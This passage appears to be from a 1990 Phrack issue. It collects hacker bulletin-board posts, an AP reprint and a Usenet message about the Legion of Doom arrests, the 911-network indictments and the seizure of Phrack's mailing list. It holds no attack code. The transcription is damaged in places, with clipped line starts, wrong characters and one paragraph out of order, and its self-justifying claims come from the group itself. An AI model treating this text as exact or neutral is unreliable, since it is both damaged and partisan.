ften than any other people. Both of them were on probation for other 
ncidents and will probably end up in jail due to probation violations 
ow. Frank and Adam still don’t know what is going on with their 
ases, as of the last time I spoke with them. 
he whole bust stemmed from another person being raided and rolling 
over on the biggest names he could think of to lighten his burden. 
Since that time, Mr. William Cook, the DA in Chicago, has made it his 
life’s goal to rid the world of the scourge of LOD. The three Atlanta 
busts, two more LOD busts in New York, and now, my Subpoena. 

People just can’t seem to grasp the fact that a group of 20 year old 
kids just might know a little more than they do, and rather than make 
good use of us, they would rather just lock us away and keep on 
letting things pass by them. I’ve said this before, you cant stop 
burglars from robbing you when you leave the doors unlocked and merely 
bash them in the head with baseball bats when they walk in. You need 
to lock the door. But when you leave the doors open, but lock up the 
people who can close them for you another burglar will just walk right 
in. 
If anyone really wants to know anything about what is going on or just 
wants to offer any opinions about all this directly to me, I’m 
erikb@walt.cc.utexas.edu 

but my account is being monitored so don’t ask anything too explicit. 


Well, as some of you may already know, the people that put out Phrack were 
busted recently. Up until now, details were scarce, but things are starting to 
appear in the news. 
[reprinted without permission from the Milwaukee Journal Wed. Feb. 7th] 
Chicago, Ill. - AP - A computer hacker broke into the 911 emergency 
telephone network covering nine states in the South and another intruder passed 
on the access data to other hackers, authorities said. 
The Prophet], 20, of Decatur, GA., and [Knight Lightning], 
19, of Chesterfield, MO., were indicted Tuesday by 
a federal grand jury and accused of computer crimes, said acting US Atty. Ira 
H. Raphaelson. 
He said Riggs was a member of the so-called Legion of Doom hackers 
group, whose members are involved in numerous illegal activities. 
Riggs and two other alleged members also were indicted in Atlanta and 
charged in other computer break-ins. 
The government would not say if any emergency calls were disrupted or 
whether other damage was done during the tampering. 


= 


Name: The Prophet #104 
Date: Tue Feb 06 23:55:15 1990 
Imagine that you’re deaf, dumb, blind, and paralyzed from the neck down and 
totally unable to experience or communicate with the outside world. How long 
could you retain your sanity? How many of you would choose to die instead? 
How many of you think you could muster the willpower to create your own little 
mental world to live in for the rest of your life, and how long do you think 
the hospital would wait before putting you out of your misery? 

-The Prophet 
Name: The Mentor #1 
Date: Sat Jan 20 02:58:54 1990 
Welp, Phrack magazine is dead. Those of you who pay attention to BITNET know 
that the phrack accounts at U of M have been shut down. The story is as 
follows... 
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Government agents (not sure of the dept., probably SS) have apparently been 
monitoring the e-mail of the Phrack kids (Knight Lightning & Taran King) for 
some time now. Apparently, a portion of a file sent to them (and subsequently 
published) contained copyrighted information. This is all they needed. They 
have now seized th ntire Phrack net mailing list (over 500 accounts), plust 
every piece of information that Randy & Craig have (and they have a *LOT*) on 
real names, addresses and phone numbers. 

This is evolving directly out of the busts of three LOD members (Urvile, 
Leftist & Prophet). The Prophet (who is on probation) is apparently being 
threatened with a prison term if he doesn’t cooperate. We don’t know for sure 
if he cooperated or not, but what would you do in the same position? 

The same officials are apparently *VERY* interested in our co-sys, Mr. 
Bloodaxe. His net account is being watched, etc. I’1ll let him tell the story. 
board only. I will be adding a secure (and I mean fucking secure) encryption 


routine into the e-mail in the next 2 weeks - I haven’t decided exactly how to 
implement it, but it’1l let two people exchange mail encrypted by a password 
only know to the two of them. Hmmmm... carry this conversation to the 


programming board. 
Anyway, I do not think I am due to be busted, but then again, I don’t do 
a 


nything but run a board. Still, there is that possibility. I assume that my 
lines are all tapped until proven otherwise. 

There is some question to the wisdom of leaving the board up at all, but I hae 
have) personally phoned several government investigators and invited them to 
oin us here on the board. If I begin to feel that the board is putting me in 
ny kind of danger, I’11 pull it down with no notice - I hope everyone 
nderstands. 

looks like it’s sweeps-time again for the feds. Let’s hope all of us are 
ill around in 6 months to talk about it. 

he Mentor 

egion of Doom! 

Phoenix Project has been down for some time now.] 


rr 
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Newsgroups: comp.dcom.telecom 

Subject: The Purpose and Intent of the Legion of Doom 

Message-ID: <4248@accuvax.nwu.edu> 

From: anytown! legion@cs.utexas.edu (Legion of Doom) 

Date: 22 Feb 90 04:42:04 GMT 

Sender: news@accuvax.nwu.edu 

Organization: Anytown USA 

Approved: Telecom@eecs.nwu.edu 

X-Submissions-To: telecom@eecs.nwu.edu 

X-Administrivia-To: telecom-request@eecs.nwu.edu 

X-Telecom-Digest: Volume 10, Issue 121, message 4 of 5 

Lines: 51 

[Moderator’s Note: This anonymous message came in the mail today. PT] 
Well, I had to speak up. There has been a lot of frothing (mostly by 
people who believe everything that they read in the paper) about 
Legion of Doom. I have been involved in the group since 1987, and 
dislike seeing irresponsible press concerning our "plot to crash 911" 
or our "links to organized crime." 

LOD was formed to bring together the best minds from the computer 
underground -— not to do any damage or for personal profit, but to 
share experiences and discuss computing. The group has *always* 
maintained the highest ethical standards of hacker (or "cracker," as 
you prefer) ethics. On many occasions, we have acted to prevent abuse 
of systems that were *dangerous* to be out -— from government systems 
to Easter Seals systems. I have known the people involved in this 911 
case for many years, and there was *absolutely* no intent to interfere 
with or molest the 911 system in any manner. While we have 
occasionally entered a computer that we weren’t supposed to be in, it 
is grounds for expulsion from the group and social ostracism to do any 
damage to a system or to attempt to commit fraud for personal profit. 
The biggest crime that has been committed is that of curiosity. Kim, 
your 911 system is safe (from us, at least). We have been instrumental 
in closing many security holes in the past, and had hoped to continue 
to do so in the future. The list of computer security people who count 
us as allies is long, but must remain anonymous. If any of them choose 
to identify themselves, we would appreciate the support. 
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IT am among the people who no longer count themselves as "active" 
members of the group. I have been "retired" for well over a year. But 


I continue to talk to active members daily, and support the group 
through this network feed, which is mail-routed to other LODers, both 
active and accessible. 

Anyone who has any questions is welcome to mail us —- you’1ll find us 
friendly, although a bit wary. We will also be glad to talk voice with 
anyone if they wish to arrange a time to call. In spite of all the 
media garbage, we consider ourselves an ethical, positive force in 
computing and computer security. We hope others will as well. 

The Mentor/Legion of Doom 

legion%anytown.uucp@cs.utexas.edu 

Moderator’s Note: As an ’ethical, positive force in computing’, why 


can’t you sign your name to messages such as the above? Usually I 
don’t even consider anonymous messages for publication in the Digest; 
but your organization has a perfect right to tell your side of the 
story, and I am derelict if I don’t print it. Real names and 
addresses go a long way toward closing credibility gaps here. PT] 


There you go. It’s over now, forget it and move on. Nothing more to 
report on the subject that hasn’t been printed, typed, spoken, or heard in the 
last couple of months. 


Phrack 31 -  .end 


